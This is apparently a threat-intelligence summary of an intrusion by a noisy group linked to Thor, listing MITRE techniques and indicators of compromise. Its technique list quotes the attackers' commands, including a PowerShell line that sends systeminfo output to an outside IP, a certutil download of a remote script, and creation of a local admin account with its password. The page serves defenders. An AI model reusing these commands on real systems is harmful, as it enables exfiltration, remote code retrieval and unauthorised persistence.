Threat Research

Dragons in Thunder

PTsecurity-ESC
Dragons in Thunder

During investigation, a noisy secondary group using well-known tools (PowerShell, certutil, ADRecon, GodPotato, mimikatz, secretsdump, Rclone) conducted reconnaissance, created a local admin account, downloaded scripts from 95.142.40[.]51, and collected credentials and files, enabling early detection that likely prevented further impact. Correlation with an Angara Security report and overlap in tools and indicators led researchers to attribute the activity to Thor and note links to LockBit and Babuk. #Thor #QuietCrabs

Keypoints

  • The investigated incident involved two distinct groups: QuietCrabs (less noisy) and a second, noisy group that exposed activity through well-known tools and techniques.
  • The noisy actor executed PowerShell-based reconnaissance and used HTTP(s) callbacks to 95.142.40[.]51 for command-and-control and data staging.
  • Attackers downloaded ADRecon to C:userspublicad_ru.ps1 and performed Active Directory discovery, producing ADRecon-Report-.zip for review.
  • They created a local user account ‘srv’ (added to local administrators) and used GodPotato for privilege escalation.
  • Credential harvesting and data extraction were performed with secretsdump, mimikatz, and Rclone; certutil was used for tool retrieval.
  • Correlation with Angara Security research (August 19) and overlapping IOCs indicated attribution to the Thor group and potential ties to LockBit and Babuk, though ransomware binaries were not observed in this case.
  • Noisy use of widely known utilities enabled early detection and likely prevented more severe outcomes.

MITRE Techniques

  • [T1059.001 ] PowerShell – Used to run reconnaissance and pipeline results to a remote HTTP endpoint (‘powershell -Command $r=(systeminfo); iwr -Uri (“http://95.142.40[.]51:888/?data=” + [uri]::EscapeDataString($r)) -UseBasicParsing’)
  • [T1071.001 ] Application Layer Protocol: HTTP – Command-and-control and data exfiltration conducted over HTTP to 95.142.40[.]51 (‘iwr -Uri (“http://95.142.40[.]51:888/?data=” + [uri]::EscapeDataString($r))’)
  • [T1105 ] Ingress Tool Transfer – Tools and scripts were retrieved from remote hosts using certutil (‘certutil.exe -urlcache -split -f http://95.142.40[.]51:654/exec.ps1 $publicsql.ps1’)
  • [T1136.001 ] Create Account: Local Account – Attackers created a local account and added it to administrators (‘net user srv Brooklin2025! /add’)
  • [T1003 ] Credential Dumping – Credentials were harvested using public utilities such as secretsdump and mimikatz (‘they relied on utilities such as secretsdump and mimikatz’)
  • [T1082 ] System Information Discovery – System information was gathered via systeminfo invoked from PowerShell (‘powershell -Command $r=(systeminfo); …’)
  • [T1057 ] Process Discovery – Processes were enumerated using tasklist during reconnaissance (‘powershell -Command $r=(tasklist); …’)
  • [T1087 ] Account Discovery / Active Directory Discovery – Domain and account enumeration performed with whoami /priv, nltest, and ADRecon (‘powershell -Command $r=(whoami /priv); …’ and ‘nltest /dclist:’)
  • [T1068 ] Exploitation for Privilege Escalation – Public exploitation tool GodPotato was used to escalate privileges (‘the group used the publicly available GodPotato tool’)
  • [T1567 ] Exfiltration Over Web Service – User files were collected with Rclone, indicating exfiltration to remote storage or services (‘To collect user files, they used Rclone.’)

Indicators of Compromise

  • [IP Address ] C2 and hosting infrastructure – 95.142.40[.]51:888, 95.142.40[.]51:654 (used for HTTP callbacks and downloads)
  • [URL/URI ] Remote retrieval and data exfiltration endpoints – http://95.142.40[.]51:888/?data=, http://95.142.40[.]51:654/exec.ps1
  • [File Path / File Name ] Downloaded and staged scripts and reports – C:userspublicad_ru.ps1, exec.ps1, sql.ps1, file:///C:/Users//Desktop/ADRecon-Report-.zip
  • [Tool / Utility ] Tools observed on compromised hosts – ADRecon, certutil.exe, GodPotato, secretsdump, mimikatz, Rclone (and other publicly available utilities)
  • [User Account / Credential ] Created local account and password observed in commands – srv / Brooklin2025! (account added to local administrators)

Read more: https://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/dragons-in-thunder

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint